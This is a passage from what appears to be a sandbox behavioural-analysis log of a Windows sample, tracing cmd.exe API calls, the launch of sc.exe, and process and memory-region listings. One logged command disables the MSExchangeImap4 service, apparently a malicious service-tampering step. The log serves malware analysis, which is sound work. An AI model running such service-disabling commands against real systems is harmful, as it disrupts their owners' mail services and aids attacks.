FindClose (in: hFindFile=0x50b05c8 | out: hFindFile=0x50b05c8) returned 1 [0130.477] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0130.477] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0130.477] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0130.477] GetEnvironmentStringsW () returned 0x50b7d98* [0130.477] FreeEnvironmentStringsA (penv="=") returned 1 [0130.477] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.478] GetConsoleOutputCP () returned 0x1b5 [0130.478] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.478] GetUserDefaultLCID () returned 0x409 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4e6f928, cchData=128 | out: lpLCData="0") returned 2 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4e6f928, cchData=128 | out: lpLCData="0") returned 2 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4e6f928, cchData=128 | out: lpLCData="1") returned 2 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0130.478] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0130.478] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0130.479] GetConsoleTitleW (in: lpConsoleTitle=0x50baa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.479] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0130.479] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0130.479] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0130.479] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0130.480] _wcsicmp (_String1="sc", _String2=")") returned 74 [0130.480] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0130.480] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0130.480] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0130.480] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0130.480] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0130.480] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0130.481] GetConsoleTitleW (in: lpConsoleTitle=0x4e6f610, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.481] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0130.481] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0130.481] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0130.481] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0130.481] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0130.481] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0130.481] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0130.481] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0130.481] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0130.481] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0130.481] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0130.481] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0130.481] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0130.481] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0130.481] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0130.481] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0130.481] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0130.481] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0130.481] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0130.481] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0130.481] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0130.481] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0130.482] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0130.482] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0130.482] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0130.482] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0130.482] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0130.482] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0130.482] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0130.482] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0130.482] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0130.482] _wcsicmp (_String1="sc", _String2="START") returned -17 [0130.482] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0130.482] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0130.482] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0130.482] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0130.482] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0130.482] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0130.482] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0130.482] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0130.482] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0130.482] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0130.482] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0130.482] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0130.482] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0130.482] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0130.482] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0130.482] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0130.482] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0130.482] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0130.482] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0130.482] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0130.482] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0130.482] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0130.482] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0130.482] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0130.482] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0130.482] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0130.482] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0130.482] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0130.482] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0130.482] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0130.482] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0130.482] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0130.482] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0130.482] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0130.482] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0130.482] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0130.482] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0130.482] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0130.482] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0130.482] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0130.482] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0130.482] _wcsicmp (_String1="sc", _String2="START") returned -17 [0130.482] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0130.482] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0130.482] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0130.482] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0130.483] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0130.483] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0130.483] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0130.483] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0130.483] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0130.483] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0130.483] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0130.483] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0130.483] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0130.483] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0130.483] SetErrorMode (uMode=0x0) returned 0x0 [0130.483] SetErrorMode (uMode=0x1) returned 0x0 [0130.483] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x50b05d0, lpFilePart=0x4e6f11c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4e6f11c*="Desktop") returned 0x1d [0130.483] SetErrorMode (uMode=0x0) returned 0x1 [0130.483] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0130.483] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0130.491] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0130.491] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0130.491] GetConsoleTitleW (in: lpConsoleTitle=0x4e6f39c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0130.491] InitializeProcThreadAttributeList (in: lpAttributeList=0x4e6f2c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4e6f2ac | out: lpAttributeList=0x4e6f2c8, lpSize=0x4e6f2ac) returned 1 [0130.491] UpdateProcThreadAttribute (in: lpAttributeList=0x4e6f2c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x4e6f2b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4e6f2c8, lpPreviousValue=0x0) returned 1 [0130.491] GetStartupInfoW (in: lpStartupInfo=0x4e6f300 | out: lpStartupInfo=0x4e6f300*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.491] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.492] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.492] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.492] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.492] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.492] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.492] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.492] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.492] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeImap4 start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4e6f250*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeImap4 start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4e6f29c | out: lpCommandLine="sc config MSExchangeImap4 start= disabled", lpProcessInformation=0x4e6f29c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xa84, dwThreadId=0x824)) returned 1 [0130.498] CloseHandle (hObject=0xa4) returned 1 [0130.498] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.498] GetEnvironmentStringsW () returned 0x50b9f00* [0130.498] FreeEnvironmentStringsA (penv="=") returned 1 [0130.498] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0130.549] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4e6f234 | out: lpExitCode=0x4e6f234*=0x424) returned 1 [0130.549] CloseHandle (hObject=0xa8) returned 1 [0130.550] _vsnwprintf (in: _Buffer=0x4e6f31c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4e6f23c | out: _Buffer="00000424") returned 8 [0130.550] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0130.550] GetEnvironmentStringsW () returned 0x50bb378* [0130.550] FreeEnvironmentStringsA (penv="=") returned 1 [0130.550] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0130.550] GetEnvironmentStringsW () returned 0x50bb378* [0130.550] FreeEnvironmentStringsA (penv="=") returned 1 [0130.550] DeleteProcThreadAttributeList (in: lpAttributeList=0x4e6f2c8 | out: lpAttributeList=0x4e6f2c8) [0130.550] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.550] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0130.550] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.550] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0130.550] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.550] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0130.551] SetConsoleInputExeNameW () returned 0x1 [0130.551] GetConsoleOutputCP () returned 0x1b5 [0130.551] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.551] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.551] exit (_Code=1060) Thread: id = 464 os_tid = 0xa88 Process: id = "132" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x26df0000" os_pid = "0xaa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "131" os_parent_pid = "0xa58" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7327 start_va = 0x7f13f000 end_va = 0x7f13ffff entry_point = 0x0 region_type = private name = "private_0x000000007f13f000" filename = "" Region: id = 7328 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7329 start_va = 0x5e7d060000 end_va = 0x5e7d07ffff entry_point = 0x0 region_type = private name = "private_0x0000005e7d060000" filename = "" Region: id = 7330 start_va = 0x5e7d080000 end_va = 0x5e7d093fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e7d080000" filename = "" Region: id = 7331 start_va = 0x5e7d0a0000 end_va = 0x5e7d0dffff entry_point = 0x0 region_type = private name = "private_0x0000005e7d0a0000" filename = "" Region: id = 7332 start_va = 0x7df5ff810000 end_va = 0x7ff5ff80ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff810000" filename = "" Region: id = 7333 start_va = 0x7ff6c44e0000 end_va = 0x7ff6c4502fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c44e0000" filename = "" Region: id = 7334 start_va = 0x7ff6c4505000 end_va = 0x7ff6c4505fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4505000" filename = "" Region: id = 7335 start_va = 0x7ff6c450e000 end_va = 0x7ff6c450ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c450e000" filename = "" Region: id = 7336 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 7337 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7338 start_va = 0x5e7d060000 end_va = 0x5e7d06ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e7d060000" filename = "" Region: id = 7339 start_va = 0x5e7d070000 end_va = 0x5e7d076fff entry_point = 0x0 region_type = private name = "private_0x0000005e7d070000" filename = "" Region: id = 7340 start_va = 0x5e7d0e0000 end_va = 0x5e7d19dfff entry_point = 0x5e7d0e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7341 start_va = 0x5e7d1a0000 end_va = 0x5e7d1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e7d1a0000" filename = "" Region: id = 7342 start_va = 0x5e7d1b0000 end_va = 0x5e7d1b6fff entry_point = 0x0 region_type = private name = "private_0x0000005e7d1b0000" filename = "" Region: id = 7343 start_va = 0x5e7d1c0000 end_va = 0x5e7d1c0fff entry_point = 0x0 region_type = private name = "private_0x0000005e7d1c0000" filename = "" Region: id = 7344 start_va = 0x5e7d1d0000 end_va = 0x5e7d2cffff entry_point = 0x0 region_type = private name = "private_0x0000005e7d1d0000" filename = "" Region: id = 7345 start_va = 0x5e7d2d0000 end_va = 0x5e7d30ffff entry_point = 0x0 region_type = private name = "private_0x0000005e7d2d0000" filename = "" Region: id = 7346 start_va = 0x5e7d310000 end_va = 0x5e7d497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e7d310000" filename = "" Region: id = 7347 start_va = 0x5e7d4a0000 end_va = 0x5e7d4a0fff entry_point = 0x0 region_type = private name = "private_0x0000005e7d4a0000" filename = "" Region: id = 7348 start_va = 0x5e7d4f0000 end_va = 0x5e7d4fffff entry_point = 0x0 region_type = private name = "private_0x0000005e7d4f0000" filename = "" Region: id = 7349 start_va = 0x5e7d500000 end_va = 0x5e7d680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e7d500000" filename = "" Region: id = 7350 start_va = 0x5e7d690000 end_va = 0x5e7ea8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005e7d690000" filename = "" Region: id = 7351 start_va = 0x7ff6c43e0000 end_va = 0x7ff6c44dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c43e0000" filename = "" Region: id = 7352 start_va = 0x7ff6c450c000 end_va = 0x7ff6c450dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c450c000" filename = "" Region: id = 7353 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 7354 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7355 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7356 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7357 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7358 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7359 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7360 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7361 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7362 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7363 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7364 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7365 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7366 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 461 os_tid = 0x9f4 Thread: id = 462 os_tid = 0xa94 Thread: id = 463 os_tid = 0xa90 Process: id = "133" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x26fe9000" os_pid = "0xa84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "131" os_parent_pid = "0xa58" cmd_line = "sc config MSExchangeImap4 start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 